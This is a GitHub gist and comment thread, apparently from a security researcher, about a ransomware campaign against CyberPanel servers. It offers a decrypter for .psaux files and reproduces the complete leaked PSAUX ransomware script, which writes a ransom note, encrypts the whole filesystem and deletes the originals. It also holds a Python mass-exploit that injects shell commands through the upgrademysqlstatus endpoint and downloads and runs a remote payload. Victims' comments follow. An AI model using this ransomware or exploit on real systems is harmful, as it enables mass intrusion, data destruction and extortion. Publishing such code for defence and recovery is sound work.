Skip to content

Instantly share code, notes, and snippets.

@gboddin
Last active December 14, 2024 20:07
Show Gist options
  • Save gboddin/d78823245b518edd54bfc2301c5f8882 to your computer and use it in GitHub Desktop.
Save gboddin/d78823245b518edd54bfc2301c5f8882 to your computer and use it in GitHub Desktop.
cyberpanel 0day leaked attack script

CyberPanel ransomware attack/defense

WARNING: Please use good judgement and extra caution before downloading and running something provided in the comment section of this gist.

This repo contains 3 things:

  • A decryption script for .psaux ransoms
  • A link to a decryptor for .encrypt ransoms
  • A list of files found on the PSAUX attack server

Ransomware status

We are currently aware of 3 separate groups encrypting CyberPanel instances. The extension they leave are:

  • .psaux -> Custom ransomware, script based, decryptor available
  • .encryp -> Variant from Babuk's source, decryptor available
  • .locked -> C3RB3R Conti v3-based Ransomware, decryptor status unknown

Decryption

If your server was only targeted by PSAUX and files have the .psaux extension, due to a flaw in PSAUX's implementation, you should be able to use the decrypter 1-decrypt.sh

If your server was only targeted by the .encryp ransomware, you can use encryp_dec.out provided by v0idxyz.

#!/bin/bash
######################################################################################
# LeakIX PSAUX CyberPanel Ransom campaign decrypter #
# #
# You have been blessed by PSAUX #
# #
# All your files can be decrypted. #
# #
# #
# Telegram: @psauxsec #
# #
# Fun must be made on that channel for weak crypto, #
# #
# Ransomware Rushed by PSAUX #
# #
######################################################################################
# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK
### Fail the script if anything's wrong, that's people's data we're dealing with
set -e
echo "Running PSAUX CyberPanel decrypter..."
### Master key gently provided by PSAUX
MASTER_KEY="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$MASTER_KEY" > /tmp/private.pem
MASTER_KEY_PATH="/tmp/private.pem"
# Decrypt the encryption key with the master key
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/key.enc -out /tmp/key.enc
openssl pkeyutl -decrypt -inkey /tmp/private.pem -in /var/iv.enc -out /tmp/iv.enc
local_key=$(cat /tmp/key.enc|xxd -p)
local_iv=$(cat /tmp/iv.enc|xxd -p)
echo "Recovered key: $local_key IV: $local_iv"
# Find all psaux file and decrypt them
find / -name "*.psaux" -type f|while read file; do
openssl enc -aes-128-cbc -d -K ${local_key} -iv ${local_iv} -in "${file}" -out "${file%\.psaux}" && rm "${file}"
echo "Restored ${file%\.psaux}"
done
#!/usr/bin/env bash
private="-----BEGIN PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDFiVLFtwUUcizD
4gUkRJayJQFAW79ZojEE8YLLnfF5x5Z1A2hP/qT21LMOmvMz03gu9Jn3G+Iby8cx
4OtvUDuG0tx+Cbq2u2lJj+ZmL11mMMbbR9aTWZhGmdVY3T9X2dObJSV94F5Itd3s
SSf4A+Osb2Ea2Ci6BCK6mCXw7Qrwr4epWuwUiZ2JqfX3Iv5oLmwLOKF/nOM0XzIp
fyopK10C/Di5erPBIAV2SYQh7sZ0JKRH7biL+s9dPM2e+8Ckuvkqkb1O1lIpOh8j
8N/dxn/y9w53KGYsSOaN0ZHseBNCbIwW1s22q4iG/p5d+UG+kTRc8HqdmENw65Vv
S8ycNPnZAgMBAAECggEBAIRgjZ7AEuBrz0IKIqX2bQK/N8J4eZhI0A7fBmcL1npk
3ZhXCz2oicZ8Le6Yumi9y6mz88Yc4n78JeZwM3aqTuoAPxEb1guFNn68t4s9LJtC
DtF+p/ahMSIHD2l5A20NJfivgRuFE8ooTqt9LxLPEHFLRsjlmQ1nnhprweleAVnf
Kl66kGZa/lAF99P7g4+3/hukVHMRPKCCEmc/77bgIw7gXe/lRutFReraGdziGky3
VkDIx7MUdGp+n4Hf4iqtUzpinN0IlvgFiMvH4aoAr5vDHitEOGuaovyeA51c2qJw
RGIAJPgWdaKj7yJl65uLmZPLxel2MCrOHqn8jv1zzw0CgYEA47kmxIT9JXoH3r0y
kxxgzR+W9FiIM+MP01F2IfoELNXP0yCZ5sSQ2p+gT61wwTZWvzmzkE8w+AcsJirs
ntlTyG5pJNQYTBSJW9lRoXykpgyRyhpEy7OES1NlWslWM2kthJQ/XZiAfaJ504ZL
cw4q3PhvcSofknRyYpLEYJ8nyg8CgYEA3hCYarpOrDxN55TB5rdU7adX4b6faK2z
NuV/grn8qqpG4nB1jj8tQI5q1NTzBe4ngLdJ6+uyGln7WvIr0llaCnhJo2Yp4EhX
5vNw3cKSdlJynZtp3k9FidhMfjrzzX3d7q7n3BFk/UgUPMRDM85q3qZzSEqLy3wI
G/WCqmMNhZcCgYBOFKMFSPAflHr0VXzs0hMi4gz5VQ3GdLltZIYT2kzqLpmms4vx
gz6Dp63pA/ggV4hg4uD9vxl0QclSgO9G/A9tLuZgWVTHaVc7pgUGUN2HjdHDMUSb
b78RsNOU0Gn9ELgpuEcNyYdtDHOnImnmVlo+D/TuIVpX9hNuVxJ8arXS4wKBgC5I
MSwVVm5JR0db1qnaTeYWOZfAHgM4KKDpZhD96G49fPaWz7ls62aICDYBiAEVaMBH
8y0re3xIgr2quX1myABkn5xhn5qyGTf2RvDBK7tjZaX5jTAbP3gCT7cDXGrYr9ee
No7ERVMQob8kfIkgnV94O5C2kLpBSINjQO94I4pTAoGASChZYdSvI46zNc8EnlcD
G7V1y3S8/Yxg3Nf7wl+s5Qot6CBRmlOOlMMQQ0JQgT5YZWcTM0IP5fEiiO6rt+w/
zHSS1/V+QNyxwb3nZhxwe0yWyqBKvDfmmxI0pRal7L6RZE9tqh40tn+Ksw4ykg5R
yROWtY+JIbuJJb26/Z5/4KQ=
-----END PRIVATE KEY-----"
echo "$private" > /var/private.pem
key_name="s2zp8fks9a0L"
echo "Encryption ID: ${key_name}"
PRIVATE_KEY_PATH="/var/private.pem"
if [ ! -f "$PRIVATE_KEY_PATH" ]; then
echo "Private key not found at $PRIVATE_KEY_PATH"
exit 1
fi
PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
if [ -z "$PRIVATE_KEY" ]; then
echo "Could not read the private key (maybe permission issue?)"
exit 1
fi
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."
login_message="
######################################################################################
# Encryptions ID : ${key_name} #
# You have been hacked by PSAUX #
# #
# All your files have been encrypted. #
# #
# To restore access, you can contact us in Telegram #
# #
# Telegram: @psauxsec #
# #
# Payment must be made in cryptocurrency. #
# #
# The price for decryption is 200 dollars. #
# Sample decryption can be served upon request. #
# #
# After payment, you will receive a key to run the decrypter script #
# on your system to restore your files. #
# All your database is downloaded and if you are not going to pay in next 3 days #
# its going to be published in darknet. Best Regards! #
# #
# #
# #
# Ransomware Made by PSAUX #
# #
######################################################################################
"
echo "$login_message" > /etc/motd
key=$(openssl rand -hex 16)
iv=$(openssl rand -hex 16)
echo "Generated key: ${key}"
echo "Generated IV: ${iv}"
echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
if [ $? -eq 0 ]; then
echo "Key encrypted successfully: /var/key.enc"
else
echo "Error with key encryption"
exit 1
fi
echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
if [ $? -eq 0 ]; then
echo "IV encrypted successfully: /var/iv.enc"
else
echo "Error with IV encryption"
exit 1
fi
excluded_dirs=(
"/proc"
"/sys"
"/dev"
"/run"
"/etc"
"/usr"
"/tmp"
"/var/run"
"/var/lock"
"/var/tmp"
"/mnt"
"/sbin"
"/lib64"
"/bin"
"/boot"
"/lib"
"/lib32"
"/srv"
"/libx32"
"/media"
"/lost+found"
)
excluded_files=(
"/var/key.enc"
"/var/iv.enc"
"/var/decrypter.sh"
"/var/index_template.html"
)
is_excluded() {
local path=$1
for excluded in "${excluded_dirs[@]}"; do
if [[ "$path" == "$excluded"* ]]; then
return 0
fi
done
for excluded in "${excluded_files[@]}"; do
if [[ "$path" == "$excluded" ]]; then
return 0
fi
done
return 1
}
encrypt_directory() {
local dir=$1
echo "Encrypting directory: $dir"
find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "Encrypting file: $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
}
encrypt_directory "/"
find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
if ! is_excluded "$dir"; then
cp /var/index_template.html "$dir/index.html"
fi
done
find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
if ! is_excluded "$file"; then
echo "[+] : $file"
openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
if [ $? -eq 0 ]; then
echo "[+] : ${file}.psaux"
rm -f "$file"
else
echo "Error encrypting: $file"
fi
else
echo "Excluded file: $file"
fi
done
rm -- "$0" && exit 0
import httpx
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
def get_CSRF_token(client):
try:
resp = client.get("/")
if resp.status_code == 200:
return resp.cookies.get('csrftoken')
else:
print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
return None
except httpx.RequestError:
print(f"Failed to connect to {client.base_url}")
return None
def pwn(client, CSRF_token, cmd):
if not CSRF_token:
return "No CSRF token"
headers = {
"X-CSRFToken": CSRF_token,
"Content-Type": "application/json",
"Referer": str(client.base_url)
}
payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
try:
response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
if response.headers.get("Content-Type", "").startswith("application/json"):
return response.json().get("requestStatus", "No response")
else:
print(f"Unexpected response type from {client.base_url}: {response.text}")
return "Unexpected response"
except httpx.RequestError:
return "Failed to execute"
def execute_command(client, command):
CSRF_token = get_CSRF_token(client)
if not CSRF_token:
print(f"Could not retrieve CSRF token from {client.base_url}")
return "Failed to retrieve CSRF token"
print(f"Executing: {command} on {client.base_url}")
stdout = pwn(client, CSRF_token, command)
print(stdout)
return stdout
def process_target(target):
print(f"Processing target: {target}")
try:
client = httpx.Client(base_url=target, verify=False, timeout=5.0)
# Step 1: Download the file
if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
return
# Step 2: Check if the file exists, retry if necessary
file_exists = False
while not file_exists:
response = execute_command(client, "ls /var/actually.sh")
if "No such file or directory" not in response:
file_exists = True
print("File found. Proceeding with further steps...")
else:
print("File not found. Waiting for the download to complete...")
time.sleep(2) # Wait for 2 seconds before checking again
# Step 3: Change permissions for the downloaded file
execute_command(client, "chmod +x /var/actually.sh")
# Step 4: Remove any carriage return issues
execute_command(client, "sed -i 's/\r//g' /var/actually.sh")
# Step 5: Execute the script with nohup to detach and log to /dev/null
execute_command(client, "nohup /var/actually.sh")
print("Script executed and detached.")
except httpx.RequestError as e:
print(f"Could not connect to {target}. Error: {str(e)}")
def main(targets_file, max_threads=5):
try:
with open(targets_file, "r") as file:
targets = [line.strip() for line in file if line.strip()]
with ThreadPoolExecutor(max_threads) as executor:
future_to_target = {executor.submit(process_target, target): target for target in targets}
for future in as_completed(future_to_target):
target = future_to_target[future]
try:
future.result()
except Exception as exc:
print(f"{target} generated an exception: {exc}")
except FileNotFoundError:
print(f"Error: File {targets_file} not found.")
sys.exit(1)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python3 ak48.py targets.txt [max_threads]")
sys.exit(1)
targets_file = sys.argv[1]
max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5
main(targets_file, max_threads)
Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai
@speeedooo83
Copy link

Yeaa yesterday we make new install UBUNTU and then new version of CYBERPANEL. Today morning - server is down - so Cyberpanel is like a big hole right now.... dont use it.

@silu44
Copy link

silu44 commented Nov 11, 2024

Decrypt frm and other files in mysql folder. Then reinstall the same version of cyberpanel on a test server, replace the original files with your backup. Now create backup sql files (dumps) from mysql for each database and import to your new server.

No encrypted files on mysql folder

@mbk87234
Copy link

Sound easy MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

No, decryptor for .locked files is not yet available. In my case it was .encryp so I was lucky.

@jajonsraviation
Copy link

hi, has anyone had any success decrypting .encryp? i have tried using https://github.com/v0idxyz/babukencrypdecrytor but im not getting any luck. Please help with guidance

@jajonsraviation
Copy link

Sound easy MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

No, decryptor for .locked files is not yet available. In my case it was .encryp so I was lucky.

man how did you manage to decrypt .encryp? some of my files were encrypted using this format?

@ronodip-basak
Copy link

@jajonsraviation use the encryp_dec.out to decrypt .encryp files, worked for me........ Make sure to only run it on a copy of data

@mbk87234
Copy link

Sound easy MBK87234 - how to decrypt frm files???? We are locked with .locked and .L0CK3D.

No, decryptor for .locked files is not yet available. In my case it was .encryp so I was lucky.

man how did you manage to decrypt .encryp? some of my files were encrypted using this format?

Can you please share a sample file. Upload it to google drive or some other place and share the link so that I can take a look at it because otherwise it is difficult to say why it didnt work.

@Gabitzzup
Copy link

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money.
the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware:
https://www.youtube.com/watch?v=UIUZGWjxaSg
officialransomsolution@gmail.com

https://t.me/RansomRescue
https://ransomrescue.org/
it has many names and many logos

@exzept
Copy link

exzept commented Nov 12, 2024

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com

https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

@exzept
Copy link

exzept commented Nov 12, 2024

Yeaa yesterday we make new install UBUNTU and then new version of CYBERPANEL. Today morning - server is down - so Cyberpanel is like a big hole right now.... dont use it.

there wasn't the slightest doubt in my mind, the developers are in cahoots with the scammers, determined to make money or they would have notified you about the hack.

@Gabitzzup
Copy link

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

@exzept
Copy link

exzept commented Nov 13, 2024

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Sadly unlucky, I got all my files back.

@exzept
Copy link

exzept commented Nov 13, 2024

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

@exzept
Copy link

exzept commented Nov 13, 2024

https://t.me/RansomRescue they can't do anything, they're crooks.

@zapsjava
Copy link

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

so, You are saying that I can send you one file and you will decrypt it? how can I contact you and how much it costs for more than one file?

@exzept
Copy link

exzept commented Nov 13, 2024

golbd, there are guys that can decrypt this but are asking too much money for me 5000 to 7000usd, i got .locked files and send them some locked files and after one hour they send me back the files decrypted... so they have the decryption key but they want to make money....

@Gabitzzup could you share the contacts of these people, lets see what we can negotiate and work out with them this will be deeply appreciated.. Thanks

Hi guys , i didnt respond, till now , but now i have news.... i negotiate with them for 550usd first one after a week can not deliver the decryption key so the man is legit never ask for money. the other one that actually decrypt test files drop from 7000 to 550usd after a week but took the money and ask for more... so is a thief and i think is behind the attack or knows the attackers i will give his contact to be aware: https://www.youtube.com/watch?v=UIUZGWjxaSg officialransomsolution@gmail.com
https://t.me/RansomRescue https://ransomrescue.org/ it has many names and many logos

you could have asked to decrypt the test file any.

The test files was decrypted this is why i agree...

Also attached the readme.txt file and I can decrypt 1 file, too) By the way, send those who do not spare your link to restore 1 file, we'll check if there is any key binding in the encryption.

so, You are saying that I can send you one file and you will decrypt it? how can I contact you and how much it costs for more than one file?

you have this feature in your test reference file

@zjcboy
Copy link

zjcboy commented Nov 15, 2024

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

@exzept
Copy link

exzept commented Nov 15, 2024

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

what is the file extension?

@inside83
Copy link

Unfortunately, I have been infected with the locked virus, is there any way to solve it?

what is the file extension?

in my case it's .L0CK3D

@zjcboy
Copy link

zjcboy commented Nov 17, 2024

不幸的是我感染了锁屏病毒,有什么办法解决吗?

文件扩展名是什么?

.locked

@jajonsraviation
Copy link

has anyone had any luck with .locked files?

@artigua
Copy link

artigua commented Nov 20, 2024

Same here, CyberPanel with .locked files… What bad luck… The backups where the files were still unencrypted were deleted a while ago.

@jajonsraviation
Copy link

based on my search it seems the .locked is a stampado ransomware and two tools seems to be recommended https://success.trendmicro.com/en-US/solution/KA-0006362 and https://www.emsisoft.com/en/ransomware-decryption/stampado/

@inside83
Copy link

based on my search it seems the .locked is a stampado ransomware and two tools seems to be recommended https://success.trendmicro.com/en-US/solution/KA-0006362 and https://www.emsisoft.com/en/ransomware-decryption/stampado/

Those are old decryption tools.
Already tested them with .L0CK3D and they do not work
The Emisoft one is asking for an email which I can't provide since read-me3.txt doesn't contain one.

@gregbtm
Copy link

gregbtm commented Nov 24, 2024

based on my search it seems the .locked is a stampado ransomware and two tools seems to be recommended https://success.trendmicro.com/en-US/solution/KA-0006362 and https://www.emsisoft.com/en/ransomware-decryption/stampado/

Those are old decryption tools. Already tested them with .L0CK3D and they do not work The Emisoft one is asking for an email which I can't provide since read-me3.txt doesn't contain one.

What if they're just .locked ? Kind of desperate :|

@markantony-sys
Copy link

I have found the decrypted file on server, its build with go executable ,
I have run file on sandbox, and its print key before start encryption key but every time run its give new key ..
can we reversed engineer the file to know what methods using on it ?

@Chocapikk
Copy link

I have found the decrypted file on server, its build with go executable , I have run file on sandbox, and its print key before start encryption key but every time run its give new key .. can we reversed engineer the file to know what methods using on it ?

Maybe you can share the file here?

@VugarAli
Copy link

VugarAli commented Dec 3, 2024

Hi @v0idxyz,

Thank you for sharing the decryption tool. I’ve noticed that some users have successfully decrypted .encryp files using it.

However, I’ve followed the provided instructions and encountered an issue. While the file extensions are changed, the content remains encrypted and unreadable.

Could you please provide additional guidance or clarify if there are any prerequisites or common mistakes to avoid? Your help would be greatly appreciated.

Thank you in advance!

@Mizer-Mi
Copy link

Is there any update for '.L0CK3D'? And are there any people who can solve this by paying money?

@gregbtm
Copy link

gregbtm commented Dec 14, 2024

Is there any update for '.L0CK3D'? And are there any people who can solve this by paying money?

I'm after the same

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment